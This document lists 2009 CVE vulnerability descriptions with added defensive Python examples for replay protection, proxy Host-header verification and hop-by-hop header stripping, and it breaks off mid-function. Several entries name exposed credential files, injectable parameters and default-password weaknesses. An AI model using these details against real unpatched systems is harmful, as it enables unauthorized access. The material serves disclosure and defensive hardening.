[CVE-2009-1051] FubarForum 1.6 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv.
[CVE-2009-1047] Cross-site scripting (XSS) vulnerability in the Send by e-mail module in the "Printer, e-mail and PDF versions" module 5.x before 5.x-4.4 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via vectors involving outbound HTML e-mail.
[CVE-2009-1035] Cross-site scripting (XSS) vulnerability in the Tasklist module 5.x-1.x before 5.x-1.3 and 5.x-2.x before 5.x-2.0-alpha1, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via Cascading Style Sheets (CSS).
[CVE-2009-1030] Cross-site scripting (XSS) vulnerability in the choose_primary_blog function in wp-includes/wpmu-functions.php in WordPress MU (WPMU) before 2.7 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header.
[CVE-2009-1026] Multiple SQL injection vulnerabilities in login.php in Kim Websites 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
[CVE-2009-1016] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote authenticated users to affect confidentiality, integrity, and availability, related to IIS. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is a stack-based buffer overflow involving an unspecified Server Plug-in and a crafted SSL certificate.
[CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
[CVE-2009-1004] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality and integrity via unknown vectors.
[CVE-2009-1003] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect integrity via unknown vectors related to "access to source code of web pages."
[CVE-2009-1002] Unspecified vulnerability in Oracle BEA WebLogic Server 10.3, 10.0 Gold through MP1, 9.2 Gold through MP3, 9.1, 9.0, 8.1 Gold through SP6, and 7.0 Gold through SP7 allows remote attackers to gain privileges via unknown vectors.
[CVE-2009-1001] Unspecified vulnerability in Oracle BEA WebLogic Portal 8.1 Gold through SP6 allows remote authenticated users to gain privileges via unknown vectors.
[CVE-2009-0971] Cross-site scripting (XSS) vulnerability in futomi's CGI Cafe Access Analyzer CGI Standard Version 3.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2009-0945] Array index error in the insertItemBefore method in WebKit, as used in Apple Safari before 3.2.3 and 4 Public Beta, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome Stable before 1.0.154.65, and possibly other products allows remote attackers to execute arbitrary code via a document with a SVGPathList data structure containing a negative index in the (1) SVGTransformList, (2) SVGStringList, (3) SVGNumberList, (4) SVGPathSegList, (5) SVGPointList, or (6) SVGLengthList SVGList object, which triggers memory corruption.
[CVE-2009-0941] The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders has no management password by default, which makes it easier for remote attackers to obtain access.
[CVE-2009-0940] Multiple cross-site request forgery (CSRF) vulnerabilities in the HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders allow remote attackers to hijack the intranet connectivity of arbitrary users for requests that (1) print documents via unknown vectors, (2) modify the network configuration via a NetIPChange request to hp/device/config_result_YesNo.html/config, or (3) change the password via the Password and ConfirmPassword parameters to hp/device/set_config_password.html/config.
[CVE-2009-0934] Cross-site scripting (XSS) vulnerability in ejabberd before 2.0.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to links and MUC logs.
[CVE-2009-0931] Cross-site scripting (XSS) vulnerability in the tag cloud search script (horde/services/portal/cloud_search.php) in Horde before 3.2.4 and 3.3.3, and Horde Groupware before 1.1.5, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0930] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP before 4.2.2 and 4.3.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to (1) smime.php, (2) pgp.php, and (3) message.php.
[CVE-2009-0917] Cross-site scripting (XSS) vulnerability in DFLabs PTK 1.0.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML by providing a forensic image containing HTML documents, which are rendered in web browsers during inspection by PTK. NOTE: the vendor states that the product is intended for use in a laboratory with "no contact from / to internet."
[CVE-2009-0910] Heap-based buffer overflow in the VNnc Codec in VMware Workstation 6.5.x before 6.5.2 build 156735, VMware Player 2.5.x before 2.5.2 build 156735, VMware ACE 2.5.x before 2.5.2 build 156735, and VMware Server 2.0.x before 2.0.1 build 156745 allows remote attackers to execute arbitrary code via a crafted web page or video file, aka ZDI-CAN-436.
[CVE-2009-0909] Heap-based buffer overflow in the VNnc Codec in VMware Workstation 6.5.x before 6.5.2 build 156735, VMware Player 2.5.x before 2.5.2 build 156735, VMware ACE 2.5.x before 2.5.2 build 156735, and VMware Server 2.0.x before 2.0.1 build 156745 allows remote attackers to execute arbitrary code via a crafted web page or video file, aka ZDI-CAN-435.
[CVE-2009-0906] The Service Component Architecture (SCA) feature pack for IBM WebSphere Application Server (WAS) SCA 1.0 before 1.0.0.3 allows remote authenticated users to bypass intended authentication.transport access restrictions and obtain unspecified access via unknown vectors.
[CVE-2009-0905] IBM WebSphere MQ 6.0 before 6.0.2.8 and 7.0 before 7.0.1.0 does not properly handle long group names, which might allow local users to gain privileges by leveraging combinations of group names with the same initial substring.
[CVE-2009-0904] The IBM Stax XMLStreamWriter in the Web Services component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 does not properly process XML encoding, which allows remote attackers to bypass intended access restrictions and possibly modify data via "XML fuzzing attacks" sent through SOAP requests.
[CVE-2009-0903] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.3, and the Feature Pack for Web Services for WAS 6.1 before 6.1.0.25, when a WS-Security policy is established at the operation level, does not properly handle inbound requests that lack a SOAPAction or WS-Addressing Action, which allows remote attackers to bypass intended access restrictions via a crafted request to a JAX-WS application.
[CVE-2009-0900] Heap-based buffer overflow in the client in IBM WebSphere MQ 6.0 before 6.0.2.7 and 7.0 before 7.0.1.0 allows local users to gain privileges via crafted SSL information in a Client Channel Definition Table (CCDT) file.
[CVE-2009-0899] IBM WebSphere Application Server (WAS) 6.1 through 6.1.0.24 and 7.0 through 7.0.0.4, IBM WebSphere Portal Server 5.1 through 6.0, and IBM Integrated Solutions Console (ISC) 6.0.1 do not properly set the IsSecurityEnabled security flag during migration of WebSphere Member Manager (WMM) to Virtual Member Manager (VMM) and a Federated Repository, which allows attackers to obtain sensitive information from repositories via unspecified vectors.
[CVE-2009-0897] IBM WebSphere Partner Gateway (WPG) 6.1.0 before 6.1.0.1 and 6.1.1 before 6.1.1.1 allows remote authenticated users to obtain sensitive information via vectors related to the "schema DB2 instance id" and the bcgarchive (aka the archiver script).
[CVE-2009-0896] Buffer overflow in the queue manager in IBM WebSphere MQ 6.x before 6.0.2.7 and 7.x before 7.0.1.0 allows remote attackers to execute arbitrary code via a crafted request.
[CVE-2009-0892] The administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 and 7.0 before 7.0.0.3 allows attackers to hijack user sessions in "specific scenarios" related to a forced logout.
[CVE-2009-0891] The Web Services Security component in IBM WebSphere Application Server 7.0 before Fix Pack 1 (7.0.0.1), 6.1 before Fix Pack 23 (6.1.0.23), and 6.0.2 before Fix Pack 33 (6.0.2.33) does not properly enforce (1) nonce and (2) timestamp expiration values in WS-Security bindings as stored in the com.ibm.wsspi.wssecurity.core custom property, which allows remote authenticated users to conduct session hijacking attacks.
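
The entry above (CVE-2009-0891) concerns the two replay defences that WS-Security UsernameToken processing is supposed to enforce: the wsu:Created timestamp must be fresh, and a wsse:Nonce must not be accepted a second time while its timestamp is still fresh. The Python below is an added illustration of that enforcement logic; it is not IBM code and is not tied to the com.ibm.wsspi.wssecurity.core property. The freshness window (300 s), the clock-skew allowance (60 s), the make_header sample token and the injectable clock are assumptions made for the demonstration.

```python
import base64
import hashlib
import time
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from typing import Callable, Dict, Optional, Tuple

# OASIS WSS 1.0 namespaces carrying UsernameToken, Nonce and Created.
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"


def epoch(created: str) -> float:
    """Convert a wsu:Created value (UTC, with or without fractional seconds) to epoch seconds."""
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%M:%S.%fZ"):
        try:
            return datetime.strptime(created, fmt).replace(tzinfo=timezone.utc).timestamp()
        except ValueError:
            continue
    raise ValueError(f"unparseable Created value {created!r}")


def parse_username_token(security_xml: str) -> Tuple[bytes, float]:
    """Extract (nonce bytes, created epoch) from a wsse:Security header; ValueError if malformed."""
    root = ET.fromstring(security_xml)
    token = root.find(f".//{{{WSSE}}}UsernameToken")
    if token is None:
        raise ValueError("no UsernameToken")
    nonce_el = token.find(f"{{{WSSE}}}Nonce")
    created_el = token.find(f"{{{WSU}}}Created")
    if nonce_el is None or not nonce_el.text or created_el is None or not created_el.text:
        raise ValueError("UsernameToken lacks Nonce or Created")
    nonce = base64.b64decode(nonce_el.text.strip(), validate=True)  # binascii.Error is a ValueError
    return nonce, epoch(created_el.text.strip())


class ReplayGuard:
    """Timestamp freshness plus a nonce cache bounded by the freshness window.

    A nonce only has to be remembered until its Created time leaves the window,
    because after that the timestamp check alone rejects any replay of it.
    """

    def __init__(self, window: float = 300.0, skew: float = 60.0,
                 clock: Callable[[], float] = time.time) -> None:
        self.window = window      # assumption: how old a Created value may be
        self.skew = skew          # assumption: how far ahead a client clock may run
        self.clock = clock
        self._seen: Dict[bytes, float] = {}   # sha256(nonce) -> time it stops mattering

    def _evict(self, now: float) -> None:
        for key in [k for k, exp in self._seen.items() if exp <= now]:
            del self._seen[key]

    def check(self, nonce: bytes, created: float) -> Optional[str]:
        """Return None to accept the token, otherwise the reason for rejection."""
        now = self.clock()
        # Timestamp first, so stale or bogus tokens never enter the nonce cache.
        if created > now + self.skew:
            return "timestamp in the future"
        if created < now - self.window:
            return "timestamp expired"
        self._evict(now)
        key = hashlib.sha256(nonce).digest()
        if key in self._seen:
            return "nonce replayed"
        self._seen[key] = created + self.window
        return None

    def check_header(self, security_xml: str) -> Optional[str]:
        try:
            nonce, created = parse_username_token(security_xml)
        except (ValueError, ET.ParseError) as exc:
            return f"malformed token: {exc}"
        return self.check(nonce, created)


def make_header(nonce_b64: str, created: str, user: str = "alice") -> str:
    """Constructed sample wsse:Security header (not captured traffic)."""
    return (
        f'<wsse:Security xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}">'
        f"<wsse:UsernameToken><wsse:Username>{user}</wsse:Username>"
        f"<wsse:Nonce>{nonce_b64}</wsse:Nonce><wsu:Created>{created}</wsu:Created>"
        "</wsse:UsernameToken></wsse:Security>"
    )


if __name__ == "__main__":
    now = [epoch("2009-06-01T12:00:00Z")]          # frozen clock for the demo
    guard = ReplayGuard(clock=lambda: now[0])
    first = make_header("c29tZXJhbmRvbW5vbmNlMQ==", "2009-06-01T11:59:30Z")
    print("first use:", guard.check_header(first))   # None (accepted)
    print("replay   :", guard.check_header(first))   # nonce replayed
    print("stale    :", guard.check_header(make_header("c29tZXJhbmRvbW5vbmNlMg==", "2009-06-01T11:50:00Z")))
```

The cache is keyed on a hash of the nonce so an oversized nonce cannot inflate memory, and entries expire exactly when the timestamp check would start rejecting them anyway; a guard that only checked one of the two values (the behaviour the entry describes) accepts either an old token with a fresh-looking nonce or a fresh token replayed within the window.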
[CVE-2009-0877] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Communications Express allow remote attackers to inject arbitrary web script or HTML via the (1) Full Name or (2) Subject field.
[CVE-2009-0868] CRLF injection vulnerability in the WebLink template in Fujitsu Jasmine2000 Enterprise Edition allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.
[CVE-2009-0866] pHNews Alpha 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for extra/genbackup.php.
[CVE-2009-0862] Cross-site scripting (XSS) vulnerability in the hook_cntrlr_error_output function in modules/page/hooks/listeners.php in the admincp component in TangoCMS 2.2.x (aka Eagle) before 2.2.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2009-0861] Cross-site scripting (XSS) vulnerability in phpDenora before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via an IRC channel name. NOTE: some of these details are obtained from third party information.
[CVE-2009-0857] Cross-site scripting (XSS) vulnerability in /prm/reports in the Performance Reporting Module (PRM) for Sun Management Center (SunMC) 3.6.1 and 4.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: this can be leveraged for access to the SunMC Web Console.
[CVE-2009-0856] Multiple cross-site scripting (XSS) vulnerabilities in sample applications in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, and 6.1 before 6.1.0.23 on z/OS, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0855] Cross-site scripting (XSS) vulnerability in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 on z/OS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0850] Cross-site scripting (XSS) vulnerability in BitDefender Internet Security 2009 allows user-assisted remote attackers to inject arbitrary web script or HTML via the filename of a virus-infected file, as demonstrated by a filename inside a (1) rar or (2) zip archive file.
[CVE-2009-0830] Cross-site scripting (XSS) vulnerability in QuoteBook allows remote attackers to inject arbitrary web script or HTML via the (1) QuoteName and (2) QuoteText parameters to quotesadd.php. NOTE: the provenance of this information is unknown.
[CVE-2009-0828] QuoteBook stores quotes.inc under the web root with insufficient access control, which allows remote attackers to obtain sensitive database information, including user credentials, via a direct request.
[CVE-2009-0827] PollHelper stores poll.inc under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request.
[CVE-2009-0826] BlogHelper stores common_db.inc under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request.
[CVE-2009-0818] Cross-site scripting (XSS) vulnerability in the taxonomy_theme_admin_table_builder function (taxonomy_theme_admin.inc) in Taxonomy Theme module before 5.x-1.2, a module for Drupal, allows remote authenticated users with the "administer taxonomy" permission, or the ability to create pages when tagging is enabled, to inject arbitrary web script or HTML via the Vocabulary name (name parameter) to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-0817] Cross-site scripting (XSS) vulnerability in the Protected Node module 5.x before 5.x-1.4 and 6.x before 6.x-1.5, a module for Drupal, allows remote authenticated users with "administer site configuration" permissions to inject arbitrary web script or HTML via the Password page info field, which is not properly handled by the protected_node_enterpassword function in protected_node.module.
[CVE-2009-0814] Cross-site scripting (XSS) vulnerability in Widgets.aspx in Blogsa 1.0 Beta 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchText parameter.
[CVE-2009-0809] The Web Editor in Dassault Systemes ENOVIA SmarTeam V5 before Release 18 Service Pack 8, and possibly CATIA and other products, allows remote authenticated users to read the profile card of an object in the document class via a link that is sent from the owner of the document object.
[CVE-2009-0805] Cross-site scripting (XSS) vulnerability in piCal 0.91h and earlier, a module for XOOPS, allows remote attackers to inject arbitrary web script or HTML via the event_id parameter in index.php.
[CVE-2009-0804] Ziproxy 2.6.0, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header.
[CVE-2009-0803] SmoothWall SmoothGuardian, as used in SmoothWall Firewall, NetworkGuardian, and SchoolGuardian 2008, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header.
[CVE-2009-0802] Qbik WinGate, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header.
[CVE-2009-0801] Squid, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header.
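
The four entries above (CVE-2009-0801 through CVE-2009-0804) share one mechanism. In transparent interception the proxy already knows the client's real destination from the intercepted TCP connection, but the affected products chose the upstream from the attacker-influenced Host header instead, so a plug-in that is only allowed to talk to its own origin could steer the proxy at an intranet host. The Python below is an added illustration and is not code from Squid, WinGate, SmoothGuardian or Ziproxy: it contrasts the trusting choice with a hardened one that always connects to the intercepted destination and forwards only if Host is consistent with it. FAKE_DNS, the addresses and the HostForgery name are constructed for the demonstration. Squid 3.2 and later perform a check of this kind (its host_verify_strict directive governs how mismatches are treated).

```python
import ipaddress
from typing import Callable, Dict, List

# Constructed stand-in for DNS so the example runs offline (assumption).
FAKE_DNS: Dict[str, List[str]] = {
    "www.example.com": ["93.184.216.34"],
    "intranet.corp.example": ["10.0.0.5"],
}


def resolve(name: str) -> List[str]:
    return FAKE_DNS.get(name.lower().rstrip("."), [])


class HostForgery(Exception):
    """Raised when the Host header does not match the intercepted destination."""


def host_name(host_header: str) -> str:
    """Strip an optional :port from a Host value, handling [IPv6] literals."""
    h = host_header.strip()
    if h.startswith("["):
        return h[1:h.index("]")]
    return h.rsplit(":", 1)[0] if h.count(":") == 1 else h


def upstream_trusting_host(original_dst: str, host_header: str) -> str:
    """What the affected proxies did: the client's Host header picks the upstream.
    original_dst is ignored, so any page can point the proxy at an intranet name."""
    return host_name(host_header)


def upstream_verified(original_dst: str, host_header: str,
                      resolver: Callable[[str], List[str]] = resolve) -> str:
    """Hardened choice: always connect to the intercepted destination, and only
    forward the request if Host agrees with it (an IP literal must be that
    address; a name must resolve to it)."""
    dst = ipaddress.ip_address(original_dst)
    name = host_name(host_header)
    try:
        literal = ipaddress.ip_address(name)
    except ValueError:
        literal = None
    if literal is not None:
        if literal != dst:
            raise HostForgery(f"Host literal {name} != intercepted destination {dst}")
        return original_dst
    answers = set()
    for addr in resolver(name):
        try:
            answers.add(ipaddress.ip_address(addr))
        except ValueError:
            continue
    if dst not in answers:
        raise HostForgery(f"Host {name!r} does not resolve to intercepted destination {dst}")
    return original_dst


if __name__ == "__main__":
    # Scenario from the entries: a plug-in connects to its own origin (203.0.113.10)
    # while the page has rewritten Host to an intranet name.
    print(upstream_trusting_host("203.0.113.10", "intranet.corp.example"))  # intranet.corp.example
    try:
        upstream_verified("203.0.113.10", "intranet.corp.example")
    except HostForgery as exc:
        print("rejected:", exc)
    print(upstream_verified("93.184.216.34", "www.example.com:80"))         # 93.184.216.34
```

The property that matters is that upstream_verified never returns anything but original_dst: even if an attacker controls a DNS name that resolves to the intercepted address (rebinding), the worst outcome is a request to the server the client already reached, carrying a Host value that server can ignore.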
[CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
[CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
[CVE-2009-0767] Kipper 2.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing credentials via a direct request for job/config.data.
[CVE-2009-0764] Multiple cross-site scripting (XSS) vulnerabilities in Kipper 2.01 allow remote attackers to inject arbitrary web script or HTML via the charm parameter to (1) index.php and (2) kipper.php. NOTE: the provenance of this information is unknown.
[CVE-2009-0763] Cross-site scripting (XSS) vulnerability in default.php in Kipper 2.01 allows remote attackers to inject arbitrary web script or HTML via the charm parameter.
[CVE-2009-0762] Cross-site scripting (XSS) vulnerability in ScriptsEz Ez PHP Comment allows remote attackers to inject arbitrary web script or HTML via the name parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-0761] Cross-site scripting (XSS) vulnerability in online.asp in Team Board 1.x allows remote attackers to inject arbitrary web script or HTML via the lookname parameter.
[CVE-2009-0760] Team Board 1.x and 2.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for data/team.mdb.
[CVE-2009-0759] Multiple CRLF injection vulnerabilities in webadmin in ZNC before 0.066 allow remote authenticated users to modify the znc.conf configuration file and gain privileges via CRLF sequences in the quit message and other vectors.
[CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
[CVE-2009-0743] Cross-site scripting (XSS) vulnerability in the edit account page in the Web Server in Cisco Unified MeetingPlace Web Conferencing 6.0 before 6.0(517.0) (aka 6.0 MR4) and 7.0 before 7.0(2) (aka 7.0 MR1) allows remote authenticated users to inject arbitrary web script or HTML via the E-mail Address field.
[CVE-2009-0737] Multiple cross-site scripting (XSS) vulnerabilities in the web-based installer (config/index.php) in MediaWiki 1.6 before 1.6.12, 1.12 before 1.12.4, and 1.13 before 1.13.4, when the installer is in active use, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0736] Cross-site scripting (XSS) vulnerability in Pebble before 2.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0732] Downloadcenter 2.1 stores common.h under the web root with insufficient access control, which allows remote attackers to obtain user credentials and other sensitive information via a direct request. NOTE: the provenance of this information is unknown.
[CVE-2009-0710] Multiple cross-site scripting (XSS) vulnerabilities in PHPFootball 1.6 allow remote attackers to inject arbitrary web script or HTML via (1) the user parameter to login.php or (2) the dbfield parameter to filter.php. NOTE: the provenance of this information is unknown.
[CVE-2009-0703] SQL injection vulnerability in bview.asp in ASPThai.Net Webboard 6.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2009-0699] Cross-site scripting (XSS) vulnerability in pagesUTF8/auftrag_allgemeinauftrag.jsp in Plunet BusinessManager 4.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the (1) QUB and (2) Bez74 parameters.
[CVE-2009-0679] Cross-site scripting (XSS) vulnerability in the Your Account module in RavenNuke 2.30 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0677] avatarlist.php in the Your Account module, reached through modules.php, in Raven Web Services RavenNuke 2.30 allows remote authenticated users to execute arbitrary code via PHP sequences in an element of the replacements array, which is processed by the preg_replace function with the eval switch, as specified in an element of the patterns array.
[CVE-2009-0674] images/captcha.php in Raven Web Services RavenNuke 2.30, when register_globals and display_errors are enabled, allows remote attackers to determine the existence of local files by sending requests with full pathnames in the aFonts array parameter, and then observing the error messages, which differ between existing and nonexistent pathnames.
[CVE-2009-0673] Eval injection vulnerability in the Custom Fields feature in the Your Account module in Raven Web Services RavenNuke 2.30 allows remote authenticated administrators to execute arbitrary PHP code via the ID Field Name box in a yaCustomFields action to admin.php.
[CVE-2009-0672] SQL injection vulnerability in the Resend_Email module in Raven Web Services RavenNuke 2.30 allows remote authenticated administrators to execute arbitrary SQL commands via the user_prefix parameter to modules.php.
[CVE-2009-0664] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0.x before 1.0.11 and 1.1.x before 1.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the introduction field in a user profile or (2) an arbitrary text block in a user view.
[CVE-2009-0660] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0 before 1.0.10 and 1.1 before 1.1.2 allow remote attackers to inject arbitrary web script or HTML via a (1) profile and (2) blog, a different vulnerability than CVE-2009-0487.
[CVE-2009-0649] The web browser in Symbian OS on the Nokia N95 cell phone allows remote attackers to cause a denial of service (crash) via JavaScript code that calls the setAttributeNode method.
[CVE-2009-0644] The HTTP interface in Swann DVR4-SecuraNet has a certain default administrative username and password, which makes it easier for remote attackers to obtain privileged access.
[CVE-2009-0640] Directory traversal vulnerability in the administrative web server in Swann DVR4-SecuraNet allows remote attackers to read arbitrary files via a .. (dot dot) in the URI, as demonstrated by reading the vy_netman.cfg file that contains passwords.
[CVE-2009-0634] Multiple unspecified vulnerabilities in the home agent (HA) implementation in the (1) Mobile IP NAT Traversal feature and (2) Mobile IPv6 subsystem in Cisco IOS 12.3 through 12.4 allow remote attackers to cause a denial of service (input queue wedge and interface outage) via an ICMP packet, aka Bug ID CSCso05337.
[CVE-2009-0633] Multiple unspecified vulnerabilities in the (1) Mobile IP NAT Traversal feature and (2) Mobile IPv6 subsystem in Cisco IOS 12.3 through 12.4 allow remote attackers to cause a denial of service (input queue wedge and interface outage) via MIPv6 packets, aka Bug ID CSCsm97220.
[CVE-2009-0631] Unspecified vulnerability in Cisco IOS 12.0 through 12.4, when configured with (1) IP Service Level Agreements (SLAs) Responder, (2) Session Initiation Protocol (SIP), (3) H.323 Annex E Call Signaling Transport, or (4) Media Gateway Control Protocol (MGCP) allows remote attackers to cause a denial of service (blocked input queue on the inbound interface) via a crafted UDP packet.
[CVE-2009-0629] The (1) Airline Product Set (aka ALPS), (2) Serial Tunnel Code (aka STUN), (3) Block Serial Tunnel Code (aka BSTUN), (4) Native Client Interface Architecture (NCIA) support, (5) Data-link switching (aka DLSw), (6) Remote Source-Route Bridging (RSRB), (7) Point to Point Tunneling Protocol (PPTP), (8) X.25 for Record Boundary Preservation (RBP), (9) X.25 over TCP (XOT), and (10) X.25 Routing features in Cisco IOS 12.2 and 12.4 allows remote attackers to cause a denial of service (device reload) via a series of crafted TCP packets.
[CVE-2009-0622] Unspecified vulnerability in Cisco ACE Application Control Engine Module for Catalyst 6500 Switches and 7600 Routers before A2(1.2) and Cisco ACE 4710 Application Control Engine Appliance before A1(8a) allows remote authenticated users to execute arbitrary operating-system commands through a command line interface (CLI).
[CVE-2009-0621] Cisco ACE 4710 Application Control Engine Appliance before A1(8a) uses default (1) usernames and (2) passwords for (a) the administrator, (b) web management, and (c) device management, which makes it easier for remote attackers to perform configuration changes to the Device Manager and other components, or obtain operating-system access.
[CVE-2009-0620] Cisco ACE Application Control Engine Module for Catalyst 6500 Switches and 7600 Routers before A2(1.1) uses default (1) usernames and (2) passwords for (a) the administrator and (b) web management, which makes it easier for remote attackers to perform configuration changes or obtain operating-system access.
[CVE-2009-0614] Unspecified vulnerability in the Web Server in Cisco Unified MeetingPlace Web Conferencing 6.0 before 6.0(517.0) (aka 6.0 MR4) and 7.0 before 7.0(2) (aka 7.0 MR1) allows remote attackers to bypass authentication and obtain administrative access via a crafted URL.
[CVE-2009-0613] Trend Micro InterScan Web Security Suite (IWSS) 3.1 before build 1237 allows remote authenticated Auditor and Report Only users to bypass intended permission settings, and modify the system configuration, via requests to unspecified JSP pages.
[CVE-2009-0612] Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 3.x and InterScan Web Security Suite (IWSS) 3.x, when basic authorization is enabled on the standalone proxy, forwards the Proxy-Authorization header from Windows Media Player, which allows remote web servers to obtain credentials by offering a media stream and then capturing this header.
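
CVE-2009-0612 above is a header-handling mistake: credentials meant for the proxy itself (Proxy-Authorization) were relayed to the origin server, so any server a client was lured into streaming from received them. The Python below is an added illustration, not Trend Micro code. It reduces a parsed request to the headers a proxy may forward by dropping the hop-by-hop set from RFC 7230 section 6.1 (plus the non-standard Proxy-Connection) and every field named in the Connection header; the proxy then applies its own framing and connection headers on the outbound side. The sample request text is constructed.

```python
from typing import List, Tuple

Headers = List[Tuple[str, str]]

# Hop-by-hop fields (RFC 7230 s.6.1) plus the non-standard Proxy-Connection.
# Proxy-Authorization is consumed by the proxy and must never reach the origin.
HOP_BY_HOP = {
    "connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
    "te", "trailer", "transfer-encoding", "upgrade", "proxy-connection",
}


def parse_request(raw: bytes) -> Tuple[str, Headers]:
    """Split a raw HTTP/1.1 request head into (request line, ordered header list)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers: Headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        # Reject missing colons and whitespace around the field name (RFC 7230 s.3.2.4).
        if not sep or not name or name != name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name, value.strip()))
    return lines[0], headers


def forwardable_headers(headers: Headers) -> Headers:
    """Drop hop-by-hop headers and every field the Connection header names."""
    drop = set(HOP_BY_HOP)
    for name, value in headers:
        if name.lower() == "connection":
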